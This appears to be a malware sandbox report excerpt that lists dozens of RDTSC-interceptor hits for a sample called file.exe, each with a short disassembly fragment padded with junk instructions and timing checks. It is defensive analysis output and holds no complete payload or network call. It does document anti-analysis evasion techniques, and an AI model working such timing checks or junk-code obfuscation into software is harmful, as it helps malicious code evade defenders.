          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1093C second address: 4D1094B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1094B second address: 4D10963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F37B45370A4h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10963 second address: 4D10972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10972 second address: 4D10976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10976 second address: 4D1097C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1097C second address: 4D10982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10982 second address: 4D10986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10986 second address: 4D1098A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1098A second address: 4D10044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c sub esp, 04h 0x0000000f xor ebx, ebx 0x00000011 cmp eax, 00000000h 0x00000014 je 00007F37B4535E25h 0x0000001a xor eax, eax 0x0000001c mov dword ptr [esp], 00000000h 0x00000023 mov dword ptr [esp+04h], 00000000h 0x0000002b call 00007F37B8E7182Bh 0x00000030 mov edi, edi 0x00000032 jmp 00007F37B4535CE0h 0x00000037 xchg eax, ebp 0x00000038 jmp 00007F37B4535CE0h 0x0000003d push eax 0x0000003e jmp 00007F37B4535CDBh 0x00000043 xchg eax, ebp 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F37B4535CE0h 0x0000004d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10044 second address: 4D10048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10048 second address: 4D1004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1004E second address: 4D10054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10054 second address: 4D10058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10058 second address: 4D10091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F37B45370A4h 0x0000000f push FFFFFFFEh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F37B45370A7h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10091 second address: 4D100D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 push edi 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007F37B4535CD9h 0x00000010 pushad 0x00000011 call 00007F37B4535CE3h 0x00000016 jmp 00007F37B4535CE8h 0x0000001b pop ecx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D100D5 second address: 4D1016C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, dx 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F37B45370A8h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 mov edx, 7B16A2F4h 0x00000019 mov bx, FA60h 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 jmp 00007F37B45370A6h 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 pushad 0x0000002a mov bh, ABh 0x0000002c mov ebx, ecx 0x0000002e popad 0x0000002f pop eax 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F37B45370A2h 0x00000037 add ch, 00000008h 0x0000003a jmp 00007F37B453709Bh 0x0000003f popfd 0x00000040 mov edi, ecx 0x00000042 popad 0x00000043 push 0584E1DBh 0x00000048 jmp 00007F37B453709Bh 0x0000004d add dword ptr [esp], 6FB94995h 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1016C second address: 4D10187 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10187 second address: 4D101DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F37B453709Fh 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F37B45370A9h 0x0000000f adc cx, 7CE6h 0x00000014 jmp 00007F37B45370A1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov eax, dword ptr fs:[00000000h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov ch, bh 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D101DC second address: 4D101E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D101E2 second address: 4D101E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D101E6 second address: 4D1024C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F37B4535CDEh 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F37B4535CE1h 0x00000019 sub ax, 1E56h 0x0000001e jmp 00007F37B4535CE1h 0x00000023 popfd 0x00000024 mov di, cx 0x00000027 popad 0x00000028 nop 0x00000029 jmp 00007F37B4535CDAh 0x0000002e sub esp, 18h 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 mov si, 3553h 0x00000038 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1024C second address: 4D102B5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F37B45370A8h 0x00000008 or cx, E2D8h 0x0000000d jmp 00007F37B453709Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jmp 00007F37B45370A8h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c jmp 00007F37B45370A0h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F37B453709Eh 0x00000029 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D102B5 second address: 4D102F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F37B4535CE6h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F37B4535CE7h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D102F5 second address: 4D102FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D102FB second address: 4D10318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F37B4535CDEh 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10318 second address: 4D1031F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1031F second address: 4D1037E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F37B4535CE2h 0x00000009 or cx, 3DE8h 0x0000000e jmp 00007F37B4535CDBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F37B4535CE8h 0x0000001a sub si, D048h 0x0000001f jmp 00007F37B4535CDBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 xchg eax, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e mov di, 3724h 0x00000032 popad 0x00000033 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1037E second address: 4D10383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10383 second address: 4D103DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 9645h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx ebx, ax 0x00000010 push esi 0x00000011 call 00007F37B4535CE9h 0x00000016 pop eax 0x00000017 pop edx 0x00000018 popad 0x00000019 xchg eax, edi 0x0000001a jmp 00007F37B4535CDCh 0x0000001f mov eax, dword ptr [75444538h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F37B4535CE7h 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D103DB second address: 4D1042C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c jmp 00007F37B453709Eh 0x00000011 xor eax, ebp 0x00000013 jmp 00007F37B45370A1h 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F37B453709Dh 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1042C second address: 4D1047E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007F37B4535CE3h 0x0000000c and ch, 0000001Eh 0x0000000f jmp 00007F37B4535CE9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F37B4535CE3h 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1047E second address: 4D10482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10482 second address: 4D10488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10488 second address: 4D1048E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1048E second address: 4D104A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop esi 0x0000000e movsx ebx, ax 0x00000011 popad 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D104A0 second address: 4D104C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F37B453709Dh 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D104C3 second address: 4D104D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F37B4535CDCh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D104D3 second address: 4D104D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D104D7 second address: 4D1050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], eax 0x0000000e pushad 0x0000000f mov cl, dh 0x00000011 mov bx, si 0x00000014 popad 0x00000015 mov dword ptr [ebp-18h], esp 0x00000018 jmp 00007F37B4535CE0h 0x0000001d mov eax, dword ptr fs:[00000018h] 0x00000023 pushad 0x00000024 pushad 0x00000025 mov edx, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1050B second address: 4D1055C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ax, AB75h 0x00000009 popad 0x0000000a mov ecx, dword ptr [eax+00000FDCh] 0x00000010 jmp 00007F37B45370A0h 0x00000015 test ecx, ecx 0x00000017 jmp 00007F37B45370A0h 0x0000001c jns 00007F37B45370DEh 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F37B45370A7h 0x00000029 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1055C second address: 4D10562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10562 second address: 4D10566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D10566 second address: 4D1056A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0002D second address: 4D00033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00033 second address: 4D000B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e movsx ebx, ax 0x00000011 pop ecx 0x00000012 mov edi, 3B6559E8h 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b call 00007F37B4535CDDh 0x00000020 call 00007F37B4535CE0h 0x00000025 pop esi 0x00000026 pop edx 0x00000027 pushfd 0x00000028 jmp 00007F37B4535CE0h 0x0000002d sub esi, 259EF778h 0x00000033 jmp 00007F37B4535CDBh 0x00000038 popfd 0x00000039 popad 0x0000003a sub esp, 2Ch 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F37B4535CE0h 0x00000046 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D000B0 second address: 4D000BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D000BF second address: 4D000FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F37B4535CDEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F37B4535CDEh 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D000FC second address: 4D00102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00102 second address: 4D00154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F37B4535CDFh 0x00000010 sbb ecx, 55C28F5Eh 0x00000016 jmp 00007F37B4535CE9h 0x0000001b popfd 0x0000001c mov ecx, 7B959C27h 0x00000021 popad 0x00000022 xchg eax, edi 0x00000023 jmp 00007F37B4535CDAh 0x00000028 push eax 0x00000029 pushad 0x0000002a mov bh, 55h 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00154 second address: 4D0016E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 xchg eax, edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F37B45370A1h 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0016E second address: 4D00174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00174 second address: 4D00178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0022A second address: 4D00230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00230 second address: 4D00281 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F37B453729Ah 0x00000011 pushad 0x00000012 call 00007F37B453709Ch 0x00000017 mov ch, C0h 0x00000019 pop edx 0x0000001a pushfd 0x0000001b jmp 00007F37B453709Ch 0x00000020 adc si, EB28h 0x00000025 jmp 00007F37B453709Bh 0x0000002a popfd 0x0000002b popad 0x0000002c lea ecx, dword ptr [ebp-14h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00281 second address: 4D00285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00285 second address: 4D0028B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D002CA second address: 4D0031B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F37B4535CDFh 0x00000009 and ecx, 16609F2Eh 0x0000000f jmp 00007F37B4535CE9h 0x00000014 popfd 0x00000015 mov bx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f call 00007F37B4535CE2h 0x00000024 pop ecx 0x00000025 popad 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D00367 second address: 4D003DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F37B453709Ch 0x00000012 adc ah, 00000028h 0x00000015 jmp 00007F37B453709Bh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F37B45370A8h 0x00000021 sub al, FFFFFF88h 0x00000024 jmp 00007F37B453709Bh 0x00000029 popfd 0x0000002a popad 0x0000002b jg 00007F3824C25156h 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov dx, 94F6h 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D003DC second address: 4D0041D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F37B4535D33h 0x0000000f jmp 00007F37B4535CE0h 0x00000014 cmp dword ptr [ebp-14h], edi 0x00000017 jmp 00007F37B4535CE0h 0x0000001c jne 00007F3824C23D5Eh 0x00000022 pushad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0041D second address: 4D00457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F37B45370A8h 0x0000000b and ax, A7A8h 0x00000010 jmp 00007F37B453709Bh 0x00000015 popfd 0x00000016 popad 0x00000017 mov ebx, dword ptr [ebp+08h] 0x0000001a pushad 0x0000001b mov edi, ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00457 second address: 4D0045B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0045B second address: 4D004DF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F37B453709Ch 0x00000008 sbb ecx, 1FA01A08h 0x0000000e jmp 00007F37B453709Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 lea eax, dword ptr [ebp-2Ch] 0x0000001a jmp 00007F37B45370A6h 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 mov al, 3Bh 0x00000023 pushfd 0x00000024 jmp 00007F37B45370A3h 0x00000029 sbb ax, 1FAEh 0x0000002e jmp 00007F37B45370A9h 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F37B453709Ch 0x0000003d rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D004DF second address: 4D00546 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 398930C3h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F37B4535CE6h 0x00000011 nop 0x00000012 pushad 0x00000013 push eax 0x00000014 mov eax, edx 0x00000016 pop ebx 0x00000017 mov al, 0Ch 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F37B4535CE0h 0x00000020 nop 0x00000021 jmp 00007F37B4535CE0h 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F37B4535CE7h 0x0000002e rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00546 second address: 4D0054C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0054C second address: 4D00550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00550 second address: 4D00554 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00554 second address: 4D00563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00563 second address: 4D00567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00567 second address: 4D0056D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0056D second address: 4D00573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00573 second address: 4D0058D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F37B4535CDFh 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D0058D second address: 4D00593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
